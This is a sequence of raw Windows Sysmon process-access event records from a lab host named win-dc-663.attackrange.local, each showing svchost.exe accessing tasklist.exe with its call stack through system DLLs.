21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 